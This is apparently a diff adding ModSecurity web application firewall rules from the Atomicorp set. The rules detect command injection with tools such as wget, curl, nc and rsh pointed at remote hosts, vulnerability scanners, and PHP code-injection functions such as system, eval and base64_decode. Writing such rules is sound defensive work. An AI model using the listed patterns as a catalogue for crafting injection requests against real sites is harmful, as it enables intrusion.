+#SecRule REQUEST_URI "(?:(?:perl|t?ftp|links|elinks|lynx|ncftp|(?:s|r)(?:cp|sh)|wget|lwp-(?:download|request|mirror|rget)|curl|cvs|svn).* (?:(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[a-z|0-9]\.[a-z]{2,4}/|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)|traceroute  (?:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"  	"id:340083,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic Command attempt'"
+
+# Rule 340084: Command inline detection
+#SecRule REQUEST_URI "(?: |\;|/|\'|,|\&|\=|\.)(?:(?:s|r)(?:sh|cp)) *(?:.*\@.*|(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[a-z|0-9]\.[a-z]{2,4}/|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)"  	"chain,id:340084,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Command injection attempt'"
+#SecRule  REQUEST_URI "!(?:/scp/tickets\.php|/cgi-bin/stats\.cgi)"
+
+# Rule 340085: very experimental connect command sig
+#SecRule REQUEST_URI "(?:(?:(?: |\;|/|\'|,|\&|\=|\.)(?:perl|nc|telnet|(?:r|s)sh|rexec) .*(?:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|[a-z|0-9]\.[a-z]{2,4}|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)|\;perl [a-z|0-9]+;|(?:lynx|curl|wget|links) -dump |links (?:-(?:dump-(?:charset|width)|source)|(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/))|(?: |\;|/|\'|,|\&|\=|\.)(?:(?:s|r)(?:sh|cp)) *(?:.*\@.*|(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[a-z|0-9]\.[a-z]{2,4}/|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)|(?:(?:perl|t?ftp|links|elinks|lynx|ncftp|(?:s|r)(?:cp|sh)|wget|lwp-(?:download|request|mirror|rget)|curl|cvs|svn).* (?:(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|.*[a-z|0-9]\.[a-z]{2,4}/|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)|traceroute  (?:[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+))" 	"capture,id:340085,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Command injection attempt',logdata:'%{TX.0}'"
+
+#SecMarker END_CMD_INJECTION_2
+
+########### SCANNER SIGS #######################
+SecRule REQUEST_URI "@pm nessus w00tw00t hacked" "phase:2,id:333823,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334374,t:none,pass,nolog,noauditlog,skipAfter:END_SCANNER_SIGS"
+
+# Rule 340069:  nessus 1.X 404 probe
+SecRule REQUEST_URI "(?:nessus(?:_is_probing_you_|test)|^/w00tw00t\.at\.)"  "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340069,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Web vulnerability scanner'"
+
+# Rule 340150:  Dfind signature
+# w00tw00t.at.ISC.SANS.DFind
+# not likely to catch this, as it usually happens via an invalid
+# HTTP/1.1 request without a hostname, which apache will reject therefore other rules
+# WEB_ERROR_LOG will catch this
+#SecRule REQUEST_URI  "w00tw00t" 	"phase:1,deny,status:403,t:none,t:lowercase,id:340150,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: DFind scanner attempt'"
+
+# Rule 340141: wormsign
+#SecRule REQUEST_URI "hacked ?by ?member ?of" 	"id:340141,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: worm'"
+
+SecMarker END_SCANNER_SIGS
+################ PHP DEFENSES ########################
+#
+#SecRule ARGS:PHPSESSID ";www"         "phase:2,pass,nolog,noauditlog,skip:1"
+#SecAction phase:2,pass,nolog,noauditlog,skipAfter:END_PHP_PROT_1
+#
+#types that do not have RFI at all
+SecRule TX:STATIC "@eq 1" "phase:2,id:'334819',pass,t:none,nolog,noauditlog,skipAfter:END_PHP_PROT_1"
+
+#additional types
+SecRule TX:NONPHP "@eq 1" "phase:2,id:'333824',pass,t:none,nolog,noauditlog,skipAfter:END_PHP_PROT_1"
+#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk|(?:ht|x)ml)$" phase:2,id:333824,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_PHP_PROT_1
+
+
+# Rule 340076: PHP defenses
+SecRule ARGS:PHPSESSID "(?:!^[0-9a-z]*$|!^[0-9a-z]*;www)"  "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340076,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: PHP Session attack'"
+
+
+# Rule 340079: PHP defenses
+SecRule REQUEST_COOKIES:sessionid "![0-9a-z]*$" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:340079,rev:10,severity:2,msg:'Atomicorp.com WAF Rules: PHP policy violation'"
+
+SecMarker END_PHP_PROT_1
+
+############# APACHE PROTECTIONS #####################
+SecRule REQUEST_URI "@pm server-info server-status cwd= jsp desudesudesu" "id:333825,t:none,t:urlDecodeUni,phase:2,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334375,t:none,pass,nolog,noauditlog,skipAfter:END_APACHE_PROT"
+
+# Rule 340114: Apache /server-info accessible
+SecRule REQUEST_URI   "^/server-(?:info|status)/?$" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,chain,id:340114,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Apache admin service access attempt'"
+SecRule REMOTE_ADDR "!@ipMatch 127.0.0.1,::1"  "t:none"
+
+# Rule 340116: generic Common HTTP vulnerability
+SecRule REQUEST_URI "(?:/\?cwd=/|a cat is fine too\.)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compresswhitespace,id:340116,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Common HTTP vulnerability'"
+
+# Rule 340097:   Tomcat view source attempt
+SecRule REQUEST_URI "\x252ejsp" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:340097,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Tomcat view source attempt'"
+
+SecMarker END_APACHE_PROT
+
+
+################PHP CODE INJECTION ATTACKS ###################
+#types that do not have RFI at all
+SecRule TX:STATIC "@eq 1" "phase:2,id:'333826',pass,t:none,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_4"
+
+#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|js|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" phase:2,pass,t:none,t:lowercase,nolog,noauditlog,id:333826,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_4
+SecRule REQUEST_URI "^/eprocservice/supplierinboundservice" "phase:2,id:363828,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_4"
+
+SecRule REQUEST_FILENAME "(?:\.(?:pl|aspx?|f?cgi|do|exe|s?html)$|/cgi-bin/)" "phase:2,id:333828,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_NOT_PERL"
+
+SecRule REQUEST_URI|REQUEST_BODY|ARGS|REQUEST_HEADERS|ARGS_NAMES|XML:/*|!ARGS:templatecode|!ARGS:areas "@pm chr system passthru serialize include php_uname preg_ mysql_query exec eval create_function create_function phpinfo decode_base64 base64_decode base64_url_decode rot13" "phase:2,id:334827,t:none,t:replaceNulls,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334376,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_B64"
+
+SecRule REQUEST_URI "(/wp-login\.php\?vaultpress=true|/site-content/|^/admin/editform)" "t:none,t:lowercase,phase:2,id:334857,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_B64"
+
+SecRule REQUEST_URI|ARGS|!ARGS:templatecode|!ARGS:areas|!ARGS:/news/|!ARGS:rsargs|!ARGS:/note/|!ARGS:announcement|!ARGS:filedata|!ARGS:customizer|!ARGS:cs_preview_state|!ARGS:SAMLResponse|!ARGS:add_new|!ARGS:/content/|!ARGS:/wysiwyg/|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:/comment/|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:post_content|!ARGS:parent_name|!ARGS:topic|!ARGS:file_content|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/desc/|!ARGS:body|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|\b(?:passthru|serialize|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|include|eval|create_function|system|base64_decode|decode_base64|base64_url_decode|str_rot13)\b ?(?:\(|\:))" "phase:2,deny,log,auditlog,status:403,t:none,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:340195,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  Base64 Encoded PHP function in Argument - this may be an attack.',logdata:'%{TX.0}'"
+
+SecMarker END_PHP_CODE_INJECTION_ATTACKS_B64
+
+#non B64 rules
+SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|ARGS_NAMES|XML:/*|!ARGS:/template/|!ARGS:areas "@pm php chr fopen fwrite globals system passthru serialize include php_uname popen proc_open mysql_query exec eval create_function proc_nice proc_terminate proc_get_status proc_close pfsockopen leak apache_child_terminate posix_kill posix_mkfifo posix_setpgid posix_setsid posix_setuid phpinfo preg_ decode_base64 base64_decode base64_url_decode rot13 <? mfunc mclude dynamic-cached-content md5 die sha" "phase:2,id:333827,t:none,t:urlDecodeUni,t:removeComments,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334377,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_1"
+
+SecRule REQUEST_URI "(?:/wp-login\.php\?vaultpress=true|/site-content/|^/admin/editform|^/admin/cms/pages/(?:edit|add)|^/admin\.php\?templates/save|^/node/[0-9]+/(?:add|edit)|^/wp-admin/options-general\.php\?page=googlepublisherplugin)" "t:none,t:lowercase,phase:2,id:364358,pass,nolog,noauditlog,skipAfter:END_RULE_340095"
+
+SecRule ARGS|!ARGS:param.code|!ARGS:templatecode|!ARGS:teaser_js|!ARGS:/^rsargs/|!ARGS:areas|!ARGS:/note/|!ARGS:printinfo|!ARGS:announcement|!ARGS:/content/|!ARGS:/wysiwyg/|!ARGS:pages|!ARGS:html|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:server_validation|!ARGS:/^data/|!ARGS:tv2|!ARGS:snippet|!ARGS:ausgabe|!ARGS:cs_preview_state|!ARGS:/editfile/|!ARGS:yaml|!ARGS:sqzr|!ARGS:/^_popupally/|!ARGS:SAMLResponse|!ARGS:/ARGS:/field_id/|!ARGS:codetocheck|!ARGS:/shortcode/|!ARGS:wpSummary|!ARGS:source|!ARGS:Form|!ARGS:/comment/|!ARGS:/field_image/|!ARGS:myDevEditControl_html|!ARGS:/details/|!ARGS:UserData|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:post_content|!ARGS:parent_name|!ARGS:topic|!ARGS:file_content|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/desc/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:content|!ARGS:params.code "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|\b(?:passthru|serialize|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|create_function|base64_decode|decode_base64|rot13|base64_url_decode|gz(?:inflate|decode|uncompress)|strrev|zlib_\w+)\b ?(?:\(|\:)|\b(?:system|include)\b ?\((?:\'|\"|\$)|< ?\? ?= ?system ?\( ?\$_|die\(\@(?:md5|sha))" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:removecomments,t:removeWhiteSpace,t:lowercase,capture,id:340095,rev:54,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP function in Argument - this may be an attack.',logdata:'%{TX.0},%{matched_var_name}'"
+
+SecMarker END_RULE_340095
+
+SecRule REQUEST_URI "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|\b(?:passthru|serialize|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|create_function|base64_decode|decode_base64|rot13|base64_url_decode|gz(?:inflate|decode|uncompress)|strrev|zlib_\w+)\b ?(?:\(|\:)|\b(?:system|include)\b ?\((?:\'|\"|\$)|< ?\? ?= ?system ?\( ?\$_|die\(\@(?:md5|sha))" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:removecomments,t:removeWhiteSpace,t:lowercase,capture,id:340087,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP function in URL - this may be an attack.',logdata:'%{TX.0},%{matched_var_name}'"
+
+# Rule 340077: PHP defenses
+SecRule ARGS|!ARGS:operate|!ARGS:search_keywords|!ARGS:templatecode|!ARGS:areas "^(?:globals(?:$|\[)|php:/)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:removeWhiteSpace,t:lowercase,id:340077,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: PHP policy violation'"
+SecMarker END_PHP_CODE_INJECTION_ATTACKS_NOT_PERL
+
+
+# Rule 340096: PHP policy violation
+SecRule ARGS_NAMES "^php:/" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,capture,id:340096,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: PHP policy violation',logdata:'%{TX.0}'"
+
+# Rule 340027: Genenric PHP body attack
+#SecRule REQUEST_BODY "(?:chr|fwrite|fopen|system|echr|passthru|php_uname|include|popen|proc_open|shell_exec|mysql_query|exec|eval|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo|reg_replace) ?\( ?'?" 	"t:none,t:urlDecodeUni,t:lowercase,capture,chain,id:340027,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Generic php body attack attempt',logdata:'%{TX.0}'"
+#SecRule REQUEST_BODY "(?:(?:cd|mkdir)[[:space:]]+(?:/|[a-z|0-9]|\.)*|perl |killall |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |lwp-(?:download|request|mirror|rget) |uname |cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat)|rexec |smbclient |t?ftp |ncftp |chmod |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z])"
+#
+SecRule REQUEST_URI "(?:/admin/structure|^/node/(?:add|[0-9]+)/(?:page|edit)|^/administrator/index\.php\?option=com_hikashop$|^/admin/cms/pages/(?:edit|add)|^/admin\.php\?templates/save)"  "t:none,t:lowercase,phase:2,id:374358,pass,nolog,noauditlog,skipAfter:END_RULE_340128"
+
+# Rule 340128: Slightly tighter version of the above
+SecRule REQUEST_URI|ARGS|XML:/*|!ARGS:/shortcode/|!ARGS:templatecode|!ARGS:areas "(?:< ?[?%] ?|\[ ?php|m(?:func|clude)|dynamic-cached-content)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:removeComments,t:compressWhitespace,t:lowercase,capture,chain,id:340128,rev:25,severity:2,msg:'Atomicorp.com WAF Rules: Remote PHP command exection',logdata:'%{TX.0}'"
+SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:/shortcode/|!ARGS:templatecode|!ARGS:areas|!ARGS:file|!ARGS:/script/|!ARGS:description|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:solution|!ARGS:problem|!ARGS:view|!ARGS:/^body/|!ARGS:payment_extrainfo|!ARGS:server_validation|!ARGS:solution|!ARGS:/suffix/|!ARGS:/prefix/|!ARGS:resolution|!ARGS:message|!ARGS:/template/|!ARGS:msg|!ARGS:/php/|!ARGS:gen_header|!ARGS:/layout/|!ARGS:post|!ARGS:/description/|!ARGS:/text/|!ARGS:/txt/|!ARGS:footerfile|!ARGS:/descr/|!ARGS:titleMetatags|!ARGS:/content/|!ARGS:/^eip_/|!ARGS:/jform/ "(?:(?:chr|fwrite|fopen|system|echr|passthru|serialize|include|php_uname|popen|proc_open|shell_exec|mysql_query|eval|create_function|str_rot13|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo|preg_\w+|base64_decode|base64_url_decode|decode_base64|zlib_\w+|strrev) ?(?:\(|\: ?'?)|system\( ?getenv ?\( ?http_php|(?:fputs|fread) ?\(|chr ?\(.{1,255}\).chr ?\(.{1,255}\).chr\()"  "t:none,t:urlDecodeUni,t:removeComments,t:compressWhitespace,t:lowercase"
+
+SecMarker END_RULE_340128
+
+# Rule 340129: Generic PHP attack sig
+#SecRule REQUEST_BODY|REQUEST_URI "system\( ?getenv ?\( ?http_php ?\) ?\)" 	"id:340129,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Generic PHP attack sig'"
+
+# Rule 340131: Generic PHP payload command injection and upload vulnerabilities
+#SecRule REQUEST_BODY|REQUEST_URI|ARGS|!ARGS:suffix|!ARGS:prefix "(?:< ?[?%] ?|\[ ?php)"	"phase:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340131,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Generic PHP payload command injection and upload vulnerabilities',chain"
+#SecRule REQUEST_BODY|REQUEST_URI|ARGS|!ARGS:suffix|!ARGS:prefix  "(?:(?:fputs|fread) ?\(.*\)\;|fsockopen ?\( ?gethostbyname|chr ?\(.*\).chr ?\(.*\).chr\(|f(?:close|gets) ?\(|(?:system|passthru|exec|eval|rot13) ?\()"
+
+# Rule 340133: HTTP header PHP code injection attacks
+SecRule REQUEST_HEADERS:Client-Ip|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "< ?[?%] ?|\[ ?php" "capture,phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,id:340133,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: HTTP header PHP code injection attack',logdata:'%{TX.0}'"
+
+# Rule 340011:
+#slightly tighter rules with narrower focus
+SecRule REQUEST_HEADERS|!REQUEST_HEADERS:REFERER|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/cookie_desc/|!REQUEST_COOKIES_NAMES:/cookie_desc/ "(?:chr|fwrite|rot13|fopen|system|passthru|serialize|php_uname|popen|proc_open|shell_exec|exec|eval|create_function|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo|preg) ?\( ?(?:\"|\')" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,capture,id:340011,rev:11,severity:2,msg:'Atomicorp.com WAF Rules: Generic PHP exploit pattern denied',logdata:'%{TX.0}'"
+
+# Rule 340005: Code injection via Headers
+#SecRule REQUEST_HEADERS|!REQUEST_HEADERS:REFERER "(?:chr|fwrite|fopen|system|passthru|include|php_uname|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo) ?\(.*\) ?\;" 	"capture,id:340005,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Code Injection in Content-Length header',logdata:'%{TX.0}'"
+
+# Rule 340010:
+#Generic PHP exploit signatures
+#SecRule REQUEST_BODY|REQUEST_URI "<\? ?php.*(?:chr|fwrite|fopen|system|echr|passthru|include|php_uname|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo) ?\(.*\)\;" 	"id:340010,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Generic PHP exploit pattern denied'"
+
+
+SecMarker END_PHP_CODE_INJECTION_ATTACKS_1
+
+SecRule ARGS_NAMES|ARGS|XML:/*|!ARGS:areas|!ARGS:templatecode "@pm ftp_ fget fput gets scanf write open read gzencode gzdecode gzinflate gzwrite compress read session_start scandir readfile readgzfile readdir move_uploaded_file proc_ call_user_function $_post $_get $_sessio str_rot13 mfunc mclude dynamic-cached-content" "phase:2,id:333829,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:334378,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_INJECTION_SPECIAL"
+
+#PHP injection
+SecRule ARGS_NAMES|ARGS|!ARGS:params.code|!ARGS:areas|!ARGS:templatecode|XML:/*|!ARGS:filecontent|!ARGS:/forbidden/|!ARGS:/descripcion/|!ARGS:/text/|!ARGS:/description/|!ARGS:/resolution/|!ARGS:codetocheck|!ARGS:ausgabe|!ARGS:/message/|!ARGS:/information/|!ARGS:/msg/|!ARGS:content|!ARGS:file|!ARGS:/jform/|!ARGS:ticket[body]|!ARGS:parent_name|!ARGS:/data/|!ARGS:/keyword/|!ARGS:search|!ARGS:/metadata/|!ARGS:/snippet/ "\b(f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|(?:g|b)z(?:(?:encod|writ)e|compress|open|read)|scandir|read(?:(?:(?:g|b)z)?file|dir)|gzinflate|move_uploaded_file|str_rot13|(?:proc_|bz)open|call_user_func|$_(?:(?:pos|ge)t|session))\b ?\(" "phase:2,deny,log,status:403,rev:15,capture,t:none,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,ctl:auditLogParts=+E,auditlog,msg:'Atomicorp.com WAF Rules:  PHP Injection Attack',id:'390715',logdata:'%{TX.0}',severity:'2'"
+SecMarker END_PHP_INJECTION_SPECIAL
+
+SecRule REQUEST_URI "(?:\?(?:q=node\/[0-9]+\/edit$|p=admin_cms&)|^/admin/cms/pages/(?:edit|add))" "t:none,t:lowercase,phase:2,id:351453,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_2"
+
+#code injection attempt
+SecRule ARGS|REQUEST_URI|XML:/*|!ARGS:areas|!ARGS:/template/ "(?:< ?[?%] ?|\[ ?php|m(?:func|clude)|dynamic-cached-content)" "id:333830,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334379,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_2"
+SecRule ARGS|REQUEST_URI|XML:/*|!ARGS:pages|!ARGS:areas|!ARGS:thecode|!ARGS:code|!ARGS:templatecode|!ARGS:/script/|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:/^snippet/|!ARGS:server_validation|!ARGS:/template/|!ARGS:message|!ARGS:content|!ARGS:feed_body|!ARGS:source|!ARGS:ausgabe|!ARGS:eingabe|!ARGS:msg|!ARGS:/content/|!ARGS:description|!ARGS:solution|!ARGS:problem|!ARGS:resolution|!ARGS:query|!ARGS:/^body/|!ARGS:/php/|!ARGS:suffix|!ARGS:prefix|!ARGS:summary|!ARGS:footerfile|!ARGS:/header/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/descr/|!ARGS:message  "(?:include ?\( ?(?:\"|\')? ?http|(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gze?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompress|curl_multi_exec|curl_exec|eval|create_function|base64_decode|base64_url_decode|decode_base64|str_rot13|php_uname|file_get_contents|parse_ini_file|shell_exec|mysql_query|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|serialize|php_uname|preg_\w+|\bexecute)\s*(?:\"|\(|@|\: ?'?))" "phase:2,deny,log,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious PHP code injection attempt',id:380018,rev:26,logdata:'%{TX.0}',severity:'2'"
+SecMarker END_PHP_CODE_INJECTION_ATTACKS_2
+
+SecRule REQUEST_URI "^/wp-admin/$" "phase:2,id:334384,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_3"
+
+#code injection attempt base64encoded
+SecRule REQUEST_BODY|ARGS|REQUEST_URI|XML:/*|!ARGS:areas|!ARGS:templatecode "(?:< ?[?%] ?|\[ ?php|m(?:func|clude)|dynamic-cached-content)" "id:333831,phase:2,t:none,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334380,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_3"
+
+SecRule REQUEST_BODY|ARGS|REQUEST_URI|XML:/*|!ARGS:areas|!ARGS:templatecode|!ARGS:pages|!ARGS:p_upload_value|!ARGS:SAMLResponse|!ARGS:server_validation|!ARGS:/script/|!ARGS:SAMLResponse|!ARGS:filedata  "(?:define|fgets|move_uploaded_file|readfile|ftp_put|ftp_fget|gze?en?code|gzinflate|ftp_nb_put|bzopen|readdir|gzread|fopen|ftp_nb_f(put|get)|ftp_get|scandir|fscanf|readgzfile|fread|proc_open|fgetc|fgetss|ftp_fput|ftp_nb_get|session_start|fwrite|gzwrite|gzopen|gzcompress|curl_multi_exec|curl_exec|eval|create_function|base64_decode|base64_url_decode|decode_base64|str_rot13|php_uname|file_get_contents|parse_ini_file|shell_exec|mysql_query|popen|ini_(?:get|restore)|safe_mode|phpinfo|system|exec|passthru|serialize|include|php_uname|preg_\w+|execute)\s*(?:\"|\(|@|\: ?'?)" "phase:2,deny,log,status:403,t:none,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,capture,auditlog,msg:'Atomicorp.com WAF Rules: Potentially malicious PHP code injection attempt - base64 encoded',id:380019,rev:8,logdata:'%{TX.0}',severity:'2'"
+
+SecMarker END_PHP_CODE_INJECTION_ATTACKS_3
+
+
+#code injection attempt hexencoded
+SecRule ARGS|REQUEST_URI_RAW|XML:/*|!ARGS:areas|!ARGS:templatecode "(?:< ?[?%] ?|\[ ?php|m(?:func|clude)|dynamic-cached-content)" "id:333832,phase:2,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:334381,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_CODE_INJECTION_ATTACKS_4"
+
